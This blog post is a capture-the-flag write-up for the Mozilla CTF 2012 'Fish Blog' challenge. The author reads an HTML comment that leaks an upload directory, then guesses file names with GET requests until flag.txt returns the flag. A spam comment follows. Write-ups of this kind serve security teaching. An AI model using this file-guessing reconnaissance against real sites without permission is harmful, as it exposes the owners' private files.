Thursday, January 26, 2012

Mozilla CTF 2012 - The Fish Blog

Challenge:
The Fish Lover's Blog contains some hidden information. Find it!

Solution:

There's not a lot of explanation for this challenge. Again, we used Burp Suite Pro to intercept our web traffic to/from the challenge site. Loading the initial page we noticed the following comments in the HTML source
< !-- the files are stored at /webserver_upload_3043493/ctf/hidden_files/ -->
< !-- BUGBUG: make sure permissions on directories and files are correct -->
Hmmm... Loading up http://challenge13.mozillactf.org/webserver_upload_30439/ctf/hidden_files/" results gives us a 403 Forbidden. So we know the directory exists, but we still don't know where the flag is. There's a shockwave object embedded into the page displaying a fish animation, but that is just a red herring (bad pun).

Well, it's a low-point challenge. Maybe we could just guess the name of the flag file?
GET /webserver_upload_3043493/ctf/hidden_files/flag HTTP/1.1

HTTP/1.1 404 Not Found
No luck.
GET /webserver_upload_3043493/ctf/hidden_files/flag.php HTTP/1.1

HTTP/1.1 404 Not Found
Still no love.
GET /webserver_upload_3043493/ctf/hidden_files/flag.txt HTTP/1.1

HTTP/1.1 200 OK


youJustGotTheFlagDudeCongrats
Woot! Another 50 points...

1 comment:

  1. I really like the content of your post. .thanks a lot for showing it to me...keep it up..
    natural gas compressor

    ReplyDelete